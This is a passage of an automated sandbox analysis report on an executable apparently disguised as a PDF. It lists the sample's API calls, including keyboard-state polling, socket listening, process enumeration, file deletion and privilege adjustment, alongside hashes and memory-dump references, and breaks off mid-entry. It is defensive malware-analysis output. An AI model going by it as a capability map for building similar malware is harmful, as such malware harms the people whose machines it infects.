                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _memset
                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                    • API String ID: 2102423945-2023335898
                                                    • Opcode ID: 0914caa1ca2de617f93f3dab6d81964ae14d9c0b8108fa00519c8db60e02c8ea
                                                    • Instruction ID: 1dfe9c3a63647fbf643f2e0307fb4fa64be34248bd9421694f1038f40246ff0b
                                                    • Opcode Fuzzy Hash: 0914caa1ca2de617f93f3dab6d81964ae14d9c0b8108fa00519c8db60e02c8ea
                                                    • Instruction Fuzzy Hash: 8282C071D04219CFCB26CF98C8807EDBBB5BF44314F2681A9D959AB751E730AE85CB90
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 003909DF
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 003909EF
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003909FB
                                                    • __wsplitpath.LIBCMT ref: 00390A59
                                                    • _wcscat.LIBCMT ref: 00390A71
                                                    • _wcscat.LIBCMT ref: 00390A83
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00390A98
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00390AAC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00390ADE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00390AFF
                                                    • _wcscpy.LIBCMT ref: 00390B0B
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00390B4A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                    • String ID: *.*
                                                    • API String ID: 3566783562-438819550
                                                    • Opcode ID: 7553b180d67da6ea4086656c7127005218c591f5bbfdae75ef020e9ba8afed49
                                                    • Instruction ID: 0d099e1c82a6cd5f16f2fa7d7ce258d3c366e6be426a284a2e8f20e7ba31b93e
                                                    • Opcode Fuzzy Hash: 7553b180d67da6ea4086656c7127005218c591f5bbfdae75ef020e9ba8afed49
                                                    • Instruction Fuzzy Hash: 4C615A725043059FDB15EF60C84599EB3E8FF89314F04891AF989DB252DB31EA45CB92
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: >$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$T.?$UCP)$UTF)$UTF16)$>>> >
                                                    • API String ID: 0-711257144
                                                    • Opcode ID: 0ed47925fadd9e57dff83c3c504fb9e9537a298f616a2d5320fde6a8d33a4982
                                                    • Instruction ID: 65d22b3bfe05532eb623a4eeef9bfbd0f57ed2b5cb6334f4b006f9dc0a0fdb26
                                                    • Opcode Fuzzy Hash: 0ed47925fadd9e57dff83c3c504fb9e9537a298f616a2d5320fde6a8d33a4982
                                                    • Instruction Fuzzy Hash: 6C728E75E042199BDB26DF59C880BBEB7F5BF08310F15816AE905EB680DB709E41DB90
                                                    APIs
                                                      • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                                      • Part of subcall function 0037ABBB: GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                                      • Part of subcall function 0037ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                                      • Part of subcall function 0037ABBB: HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                                      • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                                      • Part of subcall function 0037AC56: GetProcessHeap.KERNEL32(00000008,0037A6B5,00000000,00000000,?,0037A6B5,?), ref: 0037AC62
                                                      • Part of subcall function 0037AC56: HeapAlloc.KERNEL32(00000000,?,0037A6B5,?), ref: 0037AC69
                                                      • Part of subcall function 0037AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0037A6B5,?), ref: 0037AC7A
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0037A6D0
                                                    • _memset.LIBCMT ref: 0037A6E5
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0037A704
                                                    • GetLengthSid.ADVAPI32(?), ref: 0037A715
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0037A752
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0037A76E
                                                    • GetLengthSid.ADVAPI32(?), ref: 0037A78B
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0037A79A
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0037A7A1
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0037A7C2
                                                    • CopySid.ADVAPI32(00000000), ref: 0037A7C9
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0037A7FA
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0037A820
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0037A834
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 823baeb521bb0f17bd6d1436cc42f925c8b7ca89a84eb19d87e817d09480e59c
                                                    • Instruction ID: f4565c250fee65eb59b4dced8966e516732aa2b738f373c833bd95351dd69d8b
                                                    • Opcode Fuzzy Hash: 823baeb521bb0f17bd6d1436cc42f925c8b7ca89a84eb19d87e817d09480e59c
                                                    • Instruction Fuzzy Hash: B7513C71900619BBDF169F95DC45EEEBBB9FF44300F048129F915EA290D738AA05CB61
                                                    APIs
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                                      • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                                    • _wcscat.LIBCMT ref: 00386441
                                                    • __wsplitpath.LIBCMT ref: 0038645F
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00386474
                                                    • _wcscpy.LIBCMT ref: 003864A3
                                                    • _wcscat.LIBCMT ref: 003864B8
                                                    • _wcscat.LIBCMT ref: 003864CA
                                                    • DeleteFileW.KERNEL32(?), ref: 003864DA
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003864EB
                                                    • FindClose.KERNEL32(00000000), ref: 00386506
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                    • String ID: \*.*
                                                    • API String ID: 2643075503-1173974218
                                                    • Opcode ID: 506ec71ff2a8b747783d5648882317ca921573efef0727765af6ee3694a25892
                                                    • Instruction ID: 9a1facd701b6afc5db46735b1db745ffc9dc37f39e21a0e07f5ac346c2443e5e
                                                    • Opcode Fuzzy Hash: 506ec71ff2a8b747783d5648882317ca921573efef0727765af6ee3694a25892
                                                    • Instruction Fuzzy Hash: 393184B24083849EC722EBA48886DDFB7DCAF56310F44496EF6D8C7141EA35E50D8767
                                                    APIs
                                                      • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A328E
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003A332D
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003A33C5
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003A3604
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A3611
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: b148e20cfc7cd63a0e26a746755cddc7de06f1be0e49df60d0358141ae88e260
                                                    • Instruction ID: f1742b151c68882365903674b71f479ecd86167d1fec31b87f114ec56722d15d
                                                    • Opcode Fuzzy Hash: b148e20cfc7cd63a0e26a746755cddc7de06f1be0e49df60d0358141ae88e260
                                                    • Instruction Fuzzy Hash: 5BE15D75604210AFCB16DF29C995E6ABBE8FF8A710F04886DF44ADB261DB30ED05CB51
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00382B5F
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00382BE0
                                                    • GetKeyState.USER32(000000A0), ref: 00382BFB
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00382C15
                                                    • GetKeyState.USER32(000000A1), ref: 00382C2A
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00382C42
                                                    • GetKeyState.USER32(00000011), ref: 00382C54
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00382C6C
                                                    • GetKeyState.USER32(00000012), ref: 00382C7E
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00382C96
                                                    • GetKeyState.USER32(0000005B), ref: 00382CA8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: df7222d00df68b77efc74008eddebe1d8e23797595a2ce3998684e0a40548693
                                                    • Instruction ID: 532c199b9bfda272fb8d3c580714ed1951ced2e72e30aad6fbb31ce2b21ec0d7
                                                    • Opcode Fuzzy Hash: df7222d00df68b77efc74008eddebe1d8e23797595a2ce3998684e0a40548693
                                                    • Instruction Fuzzy Hash: E841B2345047C96DFF37BB6489047BBBEB06F12344F0580D9E9C6562C2EBA499C8C7A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: 1d4ffac07129bada24e1a644a4e7cdedb9801943f2c124da609e2562d323624f
                                                    • Instruction ID: 262c0081097a17ecfe95b50cd07c9c4051f297e8aaf256c4022e34688dbbbfd5
                                                    • Opcode Fuzzy Hash: 1d4ffac07129bada24e1a644a4e7cdedb9801943f2c124da609e2562d323624f
                                                    • Instruction Fuzzy Hash: 40215A31301210AFDB13AF64DD4AF6E77A8EF44711F05842AF95ADB2A1DB30E911CB54
                                                    APIs
                                                      • Part of subcall function 00379ABF: CLSIDFromProgID.OLE32 ref: 00379ADC
                                                      • Part of subcall function 00379ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00379AF7
                                                      • Part of subcall function 00379ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00379B05
                                                      • Part of subcall function 00379ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00379B15
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0039C235
                                                    • _memset.LIBCMT ref: 0039C242
                                                    • _memset.LIBCMT ref: 0039C360
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0039C38C
                                                    • CoTaskMemFree.OLE32(?), ref: 0039C397
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 0039C3E5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: 016e7cacdb43f6cc02be6f06808fd43e46f7a3855c62df9b5c7aa5bcd305244f
                                                    • Instruction ID: b3dc16d3ccadd1fede2f28ceed1c5852d7b00d9c3602202930b6e2a183a88389
                                                    • Opcode Fuzzy Hash: 016e7cacdb43f6cc02be6f06808fd43e46f7a3855c62df9b5c7aa5bcd305244f
                                                    • Instruction Fuzzy Hash: FA913E71D10218ABDF12DF95DC91EEEBBB8EF04710F10816AF519AB291DB706A45CFA0
                                                    APIs
                                                      • Part of subcall function 0037B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                                      • Part of subcall function 0037B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                                      • Part of subcall function 0037B134: GetLastError.KERNEL32 ref: 0037B1BA
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00387A0F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 63d02b08e188c1150c0b2c808fc6cb8c05a015e037f9f16ef9a676f342f669dc
                                                    • Instruction ID: 546218665d2453d73a47970211b6169efe9b2c7507e1f5baed10797f8645093c
                                                    • Opcode Fuzzy Hash: 63d02b08e188c1150c0b2c808fc6cb8c05a015e037f9f16ef9a676f342f669dc
                                                    • Instruction Fuzzy Hash: DD01B5716583116AE72E3664CC8ABBE725D9700340F3504A4FD03E21C1D669DE0083B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$T.?$VUUU$VUUU$VUUU$VUUU$>
                                                    • API String ID: 0-3347510974
                                                    • Opcode ID: a7e8a1d77df2a7fdc6973e2f99effb990726f757b37d935e0f286874fd14d3f6
                                                    • Instruction ID: 77a6448cd521cd2dfab09aa2659122247bf1772c9e61a74b24a6d263f2385a98
                                                    • Opcode Fuzzy Hash: a7e8a1d77df2a7fdc6973e2f99effb990726f757b37d935e0f286874fd14d3f6
                                                    • Instruction Fuzzy Hash: 3692B171E0061ACBDF26CF58C881BAEB7F5BB54314F15859AD81AEB280D770AD81CF91
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00398CA8
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398CB7
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00398CD3
                                                    • listen.WSOCK32(00000000,00000005), ref: 00398CE2
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398CFC
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00398D10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 8c10b134de8d30b0422881a0d44fb6fd6b3fd6f2cada31b2c0d217566dd0985b
                                                    • Instruction ID: 889cbc4d916eedb90dabb0599fa07347609df62e5d02ee9fd4a75f28d12162ec
                                                    • Opcode Fuzzy Hash: 8c10b134de8d30b0422881a0d44fb6fd6b3fd6f2cada31b2c0d217566dd0985b
                                                    • Instruction Fuzzy Hash: 3321B1316002009FCB12EF68CD45F6EB7E9EF89720F118558F956EB2E2CB70AD418B61
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00386554
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00386564
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00386583
                                                    • __wsplitpath.LIBCMT ref: 003865A7
                                                    • _wcscat.LIBCMT ref: 003865BA
                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003865F9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                    • String ID:
                                                    • API String ID: 1605983538-0
                                                    • Opcode ID: 7ef89de9cdbfa4f3659e82b6facc5558fc0e9d9c1f64d8124b84814f8cab9d6e
                                                    • Instruction ID: 4554f64c8dc4530dc9a96716584d2f19eb124e785e456ac47c651b79fcb1122c
                                                    • Opcode Fuzzy Hash: 7ef89de9cdbfa4f3659e82b6facc5558fc0e9d9c1f64d8124b84814f8cab9d6e
                                                    • Instruction Fuzzy Hash: BA216271900218ABDB12BBA4CD89FEEB7BCAB49300F5004E9F505E7145EB71AF85CB60
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003813DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($,2?$<2?$|
                                                    • API String ID: 1659193697-3385512009
                                                    • Opcode ID: b046f05b95574edafdbc654e5b69ef21e6983eff3c4fcf80fa28c7e5a868fc0f
                                                    • Instruction ID: 7bb2461deb0c6f4248ccfa2e61f8195f5b6fa2c75bfd4ea49f0691353aaf0caa
                                                    • Opcode Fuzzy Hash: b046f05b95574edafdbc654e5b69ef21e6983eff3c4fcf80fa28c7e5a868fc0f
                                                    • Instruction Fuzzy Hash: A5323675A007059FC729DF69C48196AB7F4FF48320B12C4AEE59ADB3A1E770E942CB44
                                                    APIs
                                                      • Part of subcall function 0039A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00399296
                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003992B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 4170576061-0
                                                    • Opcode ID: b444de2d1865ff0c523010433b6cec23d669d5c4c7109676b903836b0505f65d
                                                    • Instruction ID: 4978d68f6583b19c1e5e04f8a27cefa290613f78835a6650d6d1f21d57b11e0b
                                                    • Opcode Fuzzy Hash: b444de2d1865ff0c523010433b6cec23d669d5c4c7109676b903836b0505f65d
                                                    • Instruction Fuzzy Hash: 3741AE70600204AFDB12AF68C882F7E77EDEF44724F14455DF956AF2A2DB74AE018B91
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038EB8A
                                                    • _wcscmp.LIBCMT ref: 0038EBBA
                                                    • _wcscmp.LIBCMT ref: 0038EBCF
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0038EBE0
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0038EC0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
